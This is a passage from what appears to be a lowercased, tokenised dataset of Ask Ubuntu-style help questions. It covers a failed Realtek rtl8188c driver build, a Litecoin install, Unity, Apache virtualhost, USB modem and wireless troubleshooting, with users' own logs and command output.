rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_conf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dutesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/autoconf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_ce_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_efuse.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_io.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/cmd_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sta_info.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_iol.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_debug.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_android.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/basic_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_phy_regdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_rf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_eeprom.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_io.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_br_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.tmp_rtw_wlan_util.o rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp_ioctl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_iol.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_p2p.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_set.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_debug.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ieee80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_pwrctrl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_security.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_query.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_rtl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_sta_mgt.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_wlan_util.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.rtw_wlan_util.o.d rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/rtw_efuse.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/makefile rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ifcfg-wlan0 rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/wlan0dhcp rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/osdep_service.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/pci_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/usb_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_cfg80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/xmit_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/mlme_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/os_intfs.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/recv_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/sdio_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/rtw_android.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/kconfig rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_sreset.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_dm.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_phycfg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_ce.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_led.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_halinit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg_wowlan.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_xp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rxdesc.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rf6052.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 authentication requested [ root ] for make clean : install.sh : 38 : [ : unexpected operator rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : install.sh : 48 : [ : unexpected operator make arch=x86_64 cross_compile= -c /lib/modules/3.8.0-19-generic/build m=/home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o in file included from /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:23:0 : /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h : in function ‘thread_enter’ : /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h:575:2 : error : implicit declaration of function ‘daemonize’ [ -werror=implicit-function-declaration ] in file included from /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h:69:0 , from /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:24 : /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h : in function ‘rxmem_to_recvframe’ : /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/vitt/downloads/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg any help would be appreciated !
290453	xrdp with finnish keyboard ?	how i can get finnish keyboard layout to work with xrdp ?
290457	how to install litecoin	i 'm trying to install litecoin on my ubuntu 12.04 machine . i downloaded the litecoin-qt from http : //litecoin.org/ and extracted it to ~/ then based on the readme , i did the following : oshirowanen @ desktop : ~/litecoin/bin/64 $ ./litecoin-qt this runs litecoin , but it does not install it , i.e . when i click the super key on the keyboard to bring up the unity navigation and type in litecoin , it is not found as an installed application on my computer . so my question is , how do i install litecoin ?
290458	unity is n't working after running `unity -- replace`	how do i solve this problem ? somebody told me to do it ( unity -- replace ) on this question why is my desktop background blank after upgrade to 13.04 ? and now it 's stuffed . when i run unity i get the following error : compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found killed my output from running sudo apt-get install -- reinstall unity-services and sudo apt-get install ubuntu-desktop are : [ sudo ] password for brentonhorne : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 29.5 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //archive.ubuntu.com/ubuntu/ raring/main unity-services i386 7.0.0daily13.04.18~13.04-0ubuntu1 [ 29.5 kb ] fetched 29.5 kb in 1s ( 20.1 kb/s ) ( reading database ... 517097 files and directories currently installed . ) preparing to replace unity-services 7.0.0daily13.04.18~13.04-0ubuntu1 ( using ... /unity-services_7.0.0daily13.04.18~13.04-0ubuntu1_i386.deb ) ... unpacking replacement unity-services ... processing triggers for man-db ... setting up unity-services ( 7.0.0daily13.04.18~13.04-0ubuntu1 ) ... and reading package lists ... done building dependency tree reading state information ... done ubuntu-desktop is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . respectively . running sudo apt-get install dconf-editor gives : [ sudo ] password for brentonhorne : sorry , try again . [ sudo ] password for brentonhorne : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package dconf-editor edit : unity-panel-service : no process found compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core killed
290460	unable to transfer files from laptop to usb due to permission error	i am unable to transfer file from my system with ubuntu 11.10 os to a usb drivee ( hp 16gb ) . when i copy files from system and try to paste in usb the paste option gets disable . but the reverse is possible . any solution for this ?
290465	how can i change the desktop volume indicator color in gnome 3.8 ?	right now , whenever i use my volume up and down buttons in gnome 3.8 on 13.04 , it displays a white volume indicator . i 'm wondering if there is any way to change this to use a black & white semi-transparent indicator like the default in 12.10 .
290478	apache configuration . website does not work	i 'm trying run website on ubuntu server but it does not work . this is my configuration : /etc/apache2/sites-available/vtiger < virtualhost *:33333 > servername my.domain.com documentroot /var/www/vtigercrm/ errorlog /var/log/apache2/vtiger.my.domain.com.error_log customlog /var/log/apache2/vtiger.my.domain.com.access_log combined < directory /var/www/vtigercrm > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > /etc/apache2/sites-enabled/vtiger < virtualhost *:33333 > servername my.domain.com documentroot /var/www/vtigercrm/ errorlog /var/log/apache2/vtiger.my.domaincom.error_log customlog /var/log/apache2/vtiger.my.domain.com.access_log combined < directory /var/www/vtigercrm > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > /etc/apache2/ports.conf namevirtualhost *:33333 listen 33333 < ifmodule mod_ssl.c > # if you add namevirtualhost *:443 here , you will also have to change # the virtualhost statement in /etc/apache2/sites-available/default-ssl # to < virtualhost *:443 > # server name indication for ssl named virtual hosts is currently not # supported by msie on windows xp . listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > what is wrong ? how to fix it ? there are no errors in the logs i 'm trying also run : my.domain.com:33333 but this return : the connection has timed out
290480	broadband dongle is not working after upgrade	i upgraded 12.10 to 13.04 and my usb dongle is not recognized by network-manager . i using huawei e367 . modem is properly recognized by the system . lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 04f3:00a4 elan microelectronics corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 005 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 1bcf:2880 sunplus innovation technology inc . bus 002 device 005 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard however i can not see my dongle in network manager .
290483	xul + unity web api	is way to make unity web apps api available in xul application ? xul applications lighter than firefox . i think this is the best way for use web applications as desktop platform .
290488	unable to install package in ubuntu from command line	i am using ubuntu 12 i am unable to install software from unix or from linux i am getting following error reiki @ reiki ~ $ sudo apt-get install preload [ sudo ] password for reiki : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : preload 0 upgraded , 1 newly installed , 0 to remove and 21 not upgraded . 1 not fully installed or removed . need to get 35.6 kb of archives . after this operation , 138 kb of additional disk space will be used . get:1 http : //archive.ubuntu.com/ubuntu/ quantal/universe preload i386 0.6.4-2 [ 35.6 kb ] fetched 35.6 kb in 1s ( 34.8 kb/s ) selecting previously unselected package preload . ( reading database ... 262032 files and directories currently installed . ) unpacking preload ( from ... /preload_0.6.4-2_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up opera ( 12.15.1748-1linuxmint ) ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint dpkg : error processing opera ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up preload ( 0.6.4-2 ) ... * starting adaptive readahead daemon preload [ ok ] processing triggers for menu ... processing triggers for ureadahead ... errors were encountered while processing : opera e : sub-process /usr/bin/dpkg returned an error code ( 1 ) reiki @ reiki ~ $ when i try to remove opera then i got following error reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : opera 0 upgraded , 0 newly installed , 1 to remove and 21 not upgraded . 1 not fully installed or removed . after this operation , 45.0 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 261623 files and directories currently installed . ) removing opera ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint dpkg : error processing opera ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already processing triggers for menu ... errors were encountered while processing : opera e : sub-process /usr/bin/dpkg returned an error code ( 1 ) now i am unable to remove opera
290492	how do i uninstall ubuntu 13.04	04 and it works and all but i am dual booting it with windows 7 , but when i run ubuntu it runs then once i am in and on the desktop ubuntu it works but when i open a file or some thing it will freeze but i can still use the mouse but can not click on any thing and i want to try 12.04 on dual boot so this takes me back to my main question how do i uninstall ubuntu 13.1 and take it off dual boot ? ?
290495	problem in upgrade from 12.10 to 13.04	following message is displayed when i try online upgrade from 12.10 to 13.04. what should i do ? e : unable to parse package file /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened .
290496	wireless problem dell inspiron 5520 with 12.04	i have a dell inspiron 5520 laptop running ubuntu 12.04 . my wireless connection has problems . it would work for a while and then stop working without any reason . that means that firefox stop loading pages , skype disconnects , drop box disconnects . but the wireless network is still connected and i have very good signal . the only way to reactivate internet is plug in the lan cable or restart the laptop . i googled a bit and find that other people had problems with this laptop wireless connection on ubuntu , like the machine not detecting the wireless connection but this is a different issue . here is the output of lspci -vv 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0569 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 44 region 0 : memory at c0000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 3000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 41 region 0 : memory at c0600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 45 region 0 : memory at c0614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at c0619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 46 region 0 : memory at c0610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00002000-00002fff prefetchable memory behind bridge : 00000000c0400000-00000000c04fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : c0500000-c05fffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0569 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at c0618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : dell device 0569 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 0569 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 40 region 0 : i/o ports at 3088 [ size=8 ] region 1 : i/o ports at 3094 [ size=4 ] region 2 : i/o ports at 3080 [ size=8 ] region 3 : i/o ports at 3090 [ size=4 ] region 4 : i/o ports at 3060 [ size=32 ] region 5 : memory at c0617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : dell device 0569 control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 10 region 0 : memory at c0615000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at 3040 [ size=32 ] kernel modules : i2c-i801 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : dell device 0569 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 42 region 0 : i/o ports at 2000 [ size=256 ] region 2 : memory at c0404000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at c0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 02:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) subsystem : intel corporation centrino wireless-n 2230 bgn control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : memory at c0500000 ( 64-bit , non-prefetchable ) 